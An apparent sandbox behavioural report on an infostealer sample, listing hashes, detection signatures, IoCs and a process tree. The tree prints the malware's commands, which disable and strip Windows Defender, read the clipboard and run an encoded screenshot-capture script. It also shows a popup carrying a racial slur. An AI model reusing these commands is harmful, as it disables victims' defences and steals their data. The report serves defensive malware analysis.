Analysis
-
max time kernel
100s -
max time network
113s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
13-12-2024 13:26
Behavioral task
behavioral1
Sample
newuimatrix.exe
Resource
win10ltsc2021-20241211-en
General
-
Target
newuimatrix.exe
-
Size
7.6MB
-
MD5
5662a4ff2a06eaf7ecafdc183562483f
-
SHA1
f2ab9c6ad54c63fb3996d49b053e2aa56cc44100
-
SHA256
2a145b2d1df96b70a7514973519d96b16cc09f22bc31010bd75d242b024c9bf2
-
SHA512
c3c74f07cfb77b87e9d4a384f81f27765d541468aaea289e741f851d2c4f2005f81217cf3e68fba3a4cce9e199b7eaaad70b627e290d674ba9a413d608be280d
-
SSDEEP
196608:q9HYuwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jc:NIHziK1piXLGVE4Ue0VJY
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 4236 MpCmdRun.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4640 powershell.exe 2300 powershell.exe 4992 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3688 cmd.exe 3200 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2312 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe 1744 newuimatrix.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 discord.com 12 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 3668 tasklist.exe 2256 tasklist.exe 3036 tasklist.exe -
resource yara_rule behavioral1/files/0x0026000000046247-21.dat upx behavioral1/memory/1744-25-0x00007FFC7BA80000-0x00007FFC7C0E3000-memory.dmp upx behavioral1/files/0x0028000000046213-27.dat upx behavioral1/files/0x0026000000046245-30.dat upx behavioral1/memory/1744-48-0x00007FFC94550000-0x00007FFC9455F000-memory.dmp upx behavioral1/files/0x0026000000046233-47.dat upx behavioral1/files/0x003400000004622d-46.dat upx behavioral1/files/0x002c00000004622c-45.dat upx behavioral1/files/0x0028000000046217-44.dat upx behavioral1/files/0x0028000000046216-43.dat upx behavioral1/files/0x0028000000046215-42.dat upx behavioral1/files/0x0028000000046214-41.dat upx behavioral1/files/0x0028000000046212-40.dat upx behavioral1/files/0x002900000004624c-39.dat upx behavioral1/files/0x002900000004624b-38.dat upx behavioral1/files/0x002900000004624a-37.dat upx behavioral1/files/0x0026000000046246-34.dat upx behavioral1/files/0x0026000000046239-33.dat upx behavioral1/memory/1744-29-0x00007FFC94560000-0x00007FFC94587000-memory.dmp upx behavioral1/memory/1744-54-0x00007FFC8AD90000-0x00007FFC8ADBB000-memory.dmp upx behavioral1/memory/1744-56-0x00007FFC8AD70000-0x00007FFC8AD89000-memory.dmp upx behavioral1/memory/1744-58-0x00007FFC90280000-0x00007FFC902A5000-memory.dmp upx behavioral1/memory/1744-60-0x00007FFC8A200000-0x00007FFC8A37F000-memory.dmp upx behavioral1/memory/1744-62-0x00007FFC92600000-0x00007FFC92619000-memory.dmp upx behavioral1/memory/1744-64-0x00007FFC94180000-0x00007FFC9418D000-memory.dmp upx behavioral1/memory/1744-66-0x00007FFC8AF70000-0x00007FFC8AFA4000-memory.dmp upx behavioral1/memory/1744-71-0x00007FFC8A130000-0x00007FFC8A1FE000-memory.dmp upx behavioral1/memory/1744-74-0x00007FFC94560000-0x00007FFC94587000-memory.dmp upx behavioral1/memory/1744-73-0x00007FFC7B540000-0x00007FFC7BA73000-memory.dmp upx behavioral1/memory/1744-70-0x00007FFC7BA80000-0x00007FFC7C0E3000-memory.dmp upx behavioral1/memory/1744-77-0x00007FFC8AF50000-0x00007FFC8AF64000-memory.dmp upx behavioral1/memory/1744-76-0x00007FFC8AD90000-0x00007FFC8ADBB000-memory.dmp upx behavioral1/memory/1744-80-0x00007FFC90380000-0x00007FFC9038D000-memory.dmp upx behavioral1/memory/1744-79-0x00007FFC8AD70000-0x00007FFC8AD89000-memory.dmp upx behavioral1/memory/1744-83-0x00007FFC8AA70000-0x00007FFC8AB23000-memory.dmp upx behavioral1/memory/1744-82-0x00007FFC90280000-0x00007FFC902A5000-memory.dmp upx behavioral1/memory/1744-104-0x00007FFC8A200000-0x00007FFC8A37F000-memory.dmp upx behavioral1/memory/1744-124-0x00007FFC92600000-0x00007FFC92619000-memory.dmp upx behavioral1/memory/1744-182-0x00007FFC8AF70000-0x00007FFC8AFA4000-memory.dmp upx behavioral1/memory/1744-184-0x00007FFC8A130000-0x00007FFC8A1FE000-memory.dmp upx behavioral1/memory/1744-200-0x00007FFC7B540000-0x00007FFC7BA73000-memory.dmp upx behavioral1/memory/1744-216-0x00007FFC8AA70000-0x00007FFC8AB23000-memory.dmp upx behavioral1/memory/1744-202-0x00007FFC7BA80000-0x00007FFC7C0E3000-memory.dmp upx behavioral1/memory/1744-214-0x00007FFC8AF50000-0x00007FFC8AF64000-memory.dmp upx behavioral1/memory/1744-208-0x00007FFC8A200000-0x00007FFC8A37F000-memory.dmp upx behavioral1/memory/1744-253-0x00007FFC8AA70000-0x00007FFC8AB23000-memory.dmp upx behavioral1/memory/1744-254-0x00007FFC7B540000-0x00007FFC7BA73000-memory.dmp upx behavioral1/memory/1744-252-0x00007FFC90380000-0x00007FFC9038D000-memory.dmp upx behavioral1/memory/1744-251-0x00007FFC8AF50000-0x00007FFC8AF64000-memory.dmp upx behavioral1/memory/1744-249-0x00007FFC8A130000-0x00007FFC8A1FE000-memory.dmp upx behavioral1/memory/1744-248-0x00007FFC8AF70000-0x00007FFC8AFA4000-memory.dmp upx behavioral1/memory/1744-247-0x00007FFC94180000-0x00007FFC9418D000-memory.dmp upx behavioral1/memory/1744-246-0x00007FFC92600000-0x00007FFC92619000-memory.dmp upx behavioral1/memory/1744-245-0x00007FFC8A200000-0x00007FFC8A37F000-memory.dmp upx behavioral1/memory/1744-244-0x00007FFC90280000-0x00007FFC902A5000-memory.dmp upx behavioral1/memory/1744-243-0x00007FFC8AD70000-0x00007FFC8AD89000-memory.dmp upx behavioral1/memory/1744-242-0x00007FFC8AD90000-0x00007FFC8ADBB000-memory.dmp upx behavioral1/memory/1744-241-0x00007FFC94550000-0x00007FFC9455F000-memory.dmp upx behavioral1/memory/1744-240-0x00007FFC94560000-0x00007FFC94587000-memory.dmp upx behavioral1/memory/1744-239-0x00007FFC7BA80000-0x00007FFC7C0E3000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3252 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1876 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 2300 powershell.exe 4640 powershell.exe 4640 powershell.exe 2300 powershell.exe 2300 powershell.exe 1032 WMIC.exe 1032 WMIC.exe 1032 WMIC.exe 1032 WMIC.exe 3200 powershell.exe 3200 powershell.exe 3200 powershell.exe 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe 1136 WMIC.exe 1136 WMIC.exe 1136 WMIC.exe 1136 WMIC.exe 552 WMIC.exe 552 WMIC.exe 552 WMIC.exe 552 WMIC.exe 844 WMIC.exe 844 WMIC.exe 844 WMIC.exe 844 WMIC.exe 4992 powershell.exe 4992 powershell.exe 3252 WMIC.exe 3252 WMIC.exe 3252 WMIC.exe 3252 WMIC.exe 2420 powershell.exe 2420 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2300 powershell.exe Token: SeDebugPrivilege 4640 powershell.exe Token: SeDebugPrivilege 3668 tasklist.exe Token: SeDebugPrivilege 2256 tasklist.exe Token: SeDebugPrivilege 3036 tasklist.exe Token: SeIncreaseQuotaPrivilege 1032 WMIC.exe Token: SeSecurityPrivilege 1032 WMIC.exe Token: SeTakeOwnershipPrivilege 1032 WMIC.exe Token: SeLoadDriverPrivilege 1032 WMIC.exe Token: SeSystemProfilePrivilege 1032 WMIC.exe Token: SeSystemtimePrivilege 1032 WMIC.exe Token: SeProfSingleProcessPrivilege 1032 WMIC.exe Token: SeIncBasePriorityPrivilege 1032 WMIC.exe Token: SeCreatePagefilePrivilege 1032 WMIC.exe Token: SeBackupPrivilege 1032 WMIC.exe Token: SeRestorePrivilege 1032 WMIC.exe Token: SeShutdownPrivilege 1032 WMIC.exe Token: SeDebugPrivilege 1032 WMIC.exe Token: SeSystemEnvironmentPrivilege 1032 WMIC.exe Token: SeRemoteShutdownPrivilege 1032 WMIC.exe Token: SeUndockPrivilege 1032 WMIC.exe Token: SeManageVolumePrivilege 1032 WMIC.exe Token: 33 1032 WMIC.exe Token: 34 1032 WMIC.exe Token: 35 1032 WMIC.exe Token: 36 1032 WMIC.exe Token: SeDebugPrivilege 3200 powershell.exe Token: SeIncreaseQuotaPrivilege 4640 powershell.exe Token: SeSecurityPrivilege 4640 powershell.exe Token: SeTakeOwnershipPrivilege 4640 powershell.exe Token: SeLoadDriverPrivilege 4640 powershell.exe Token: SeSystemProfilePrivilege 4640 powershell.exe Token: SeSystemtimePrivilege 4640 powershell.exe Token: SeProfSingleProcessPrivilege 4640 powershell.exe Token: SeIncBasePriorityPrivilege 4640 powershell.exe Token: SeCreatePagefilePrivilege 4640 powershell.exe Token: SeBackupPrivilege 4640 powershell.exe Token: SeRestorePrivilege 4640 powershell.exe Token: SeShutdownPrivilege 4640 powershell.exe Token: SeDebugPrivilege 4640 powershell.exe Token: SeSystemEnvironmentPrivilege 4640 powershell.exe Token: SeRemoteShutdownPrivilege 4640 powershell.exe Token: SeUndockPrivilege 4640 powershell.exe Token: SeManageVolumePrivilege 4640 powershell.exe Token: 33 4640 powershell.exe Token: 34 4640 powershell.exe Token: 35 4640 powershell.exe Token: 36 4640 powershell.exe Token: SeIncreaseQuotaPrivilege 1032 WMIC.exe Token: SeSecurityPrivilege 1032 WMIC.exe Token: SeTakeOwnershipPrivilege 1032 WMIC.exe Token: SeLoadDriverPrivilege 1032 WMIC.exe Token: SeSystemProfilePrivilege 1032 WMIC.exe Token: SeSystemtimePrivilege 1032 WMIC.exe Token: SeProfSingleProcessPrivilege 1032 WMIC.exe Token: SeIncBasePriorityPrivilege 1032 WMIC.exe Token: SeCreatePagefilePrivilege 1032 WMIC.exe Token: SeBackupPrivilege 1032 WMIC.exe Token: SeRestorePrivilege 1032 WMIC.exe Token: SeShutdownPrivilege 1032 WMIC.exe Token: SeDebugPrivilege 1032 WMIC.exe Token: SeSystemEnvironmentPrivilege 1032 WMIC.exe Token: SeRemoteShutdownPrivilege 1032 WMIC.exe Token: SeUndockPrivilege 1032 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2076 wrote to memory of 1744 2076 newuimatrix.exe 81 PID 2076 wrote to memory of 1744 2076 newuimatrix.exe 81 PID 1744 wrote to memory of 3284 1744 newuimatrix.exe 83 PID 1744 wrote to memory of 3284 1744 newuimatrix.exe 83 PID 1744 wrote to memory of 4616 1744 newuimatrix.exe 84 PID 1744 wrote to memory of 4616 1744 newuimatrix.exe 84 PID 1744 wrote to memory of 2220 1744 newuimatrix.exe 85 PID 1744 wrote to memory of 2220 1744 newuimatrix.exe 85 PID 3284 wrote to memory of 4640 3284 cmd.exe 89 PID 3284 wrote to memory of 4640 3284 cmd.exe 89 PID 4616 wrote to memory of 2300 4616 cmd.exe 90 PID 4616 wrote to memory of 2300 4616 cmd.exe 90 PID 1744 wrote to memory of 1648 1744 newuimatrix.exe 91 PID 1744 wrote to memory of 1648 1744 newuimatrix.exe 91 PID 1744 wrote to memory of 4648 1744 newuimatrix.exe 92 PID 1744 wrote to memory of 4648 1744 newuimatrix.exe 92 PID 2220 wrote to memory of 4900 2220 cmd.exe 93 PID 2220 wrote to memory of 4900 2220 cmd.exe 93 PID 1648 wrote to memory of 3668 1648 cmd.exe 96 PID 1648 wrote to memory of 3668 1648 cmd.exe 96 PID 4648 wrote to memory of 2256 4648 cmd.exe 97 PID 4648 wrote to memory of 2256 4648 cmd.exe 97 PID 1744 wrote to memory of 2948 1744 newuimatrix.exe 98 PID 1744 wrote to memory of 2948 1744 newuimatrix.exe 98 PID 1744 wrote to memory of 1724 1744 newuimatrix.exe 100 PID 1744 wrote to memory of 1724 1744 newuimatrix.exe 100 PID 1744 wrote to memory of 3688 1744 newuimatrix.exe 99 PID 1744 wrote to memory of 3688 1744 newuimatrix.exe 99 PID 1744 wrote to memory of 1772 1744 newuimatrix.exe 104 PID 1744 wrote to memory of 1772 1744 newuimatrix.exe 104 PID 1744 wrote to memory of 8 1744 newuimatrix.exe 107 PID 1744 wrote to memory of 8 1744 newuimatrix.exe 107 PID 1744 wrote to memory of 2120 1744 newuimatrix.exe 109 PID 1744 wrote to memory of 2120 1744 newuimatrix.exe 109 PID 1772 wrote to memory of 3996 1772 cmd.exe 110 PID 1772 wrote to memory of 3996 1772 cmd.exe 110 PID 1724 wrote to memory of 3036 1724 cmd.exe 111 PID 1724 wrote to memory of 3036 1724 cmd.exe 111 PID 2948 wrote to memory of 1032 2948 cmd.exe 113 PID 2948 wrote to memory of 1032 2948 cmd.exe 113 PID 3688 wrote to memory of 3200 3688 cmd.exe 114 PID 3688 wrote to memory of 3200 3688 cmd.exe 114 PID 1744 wrote to memory of 2588 1744 newuimatrix.exe 115 PID 1744 wrote to memory of 2588 1744 newuimatrix.exe 115 PID 8 wrote to memory of 1876 8 cmd.exe 117 PID 8 wrote to memory of 1876 8 cmd.exe 117 PID 2120 wrote to memory of 1152 2120 cmd.exe 118 PID 2120 wrote to memory of 1152 2120 cmd.exe 118 PID 2588 wrote to memory of 3028 2588 cmd.exe 119 PID 2588 wrote to memory of 3028 2588 cmd.exe 119 PID 1744 wrote to memory of 2780 1744 newuimatrix.exe 121 PID 1744 wrote to memory of 2780 1744 newuimatrix.exe 121 PID 2780 wrote to memory of 1924 2780 cmd.exe 123 PID 2780 wrote to memory of 1924 2780 cmd.exe 123 PID 1744 wrote to memory of 116 1744 newuimatrix.exe 124 PID 1744 wrote to memory of 116 1744 newuimatrix.exe 124 PID 116 wrote to memory of 3540 116 cmd.exe 126 PID 116 wrote to memory of 3540 116 cmd.exe 126 PID 1744 wrote to memory of 1512 1744 newuimatrix.exe 127 PID 1744 wrote to memory of 1512 1744 newuimatrix.exe 127 PID 1152 wrote to memory of 2888 1152 powershell.exe 129 PID 1152 wrote to memory of 2888 1152 powershell.exe 129 PID 1512 wrote to memory of 4404 1512 cmd.exe 130 PID 1512 wrote to memory of 4404 1512 cmd.exe 130
Processes
-
C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe"C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe"C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:4236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('fucked nigger', 0, 'ERROR CODE:403', 32+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('fucked nigger', 0, 'ERROR CODE:403', 32+16);close()"4⤵PID:4900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:1772 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:3996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA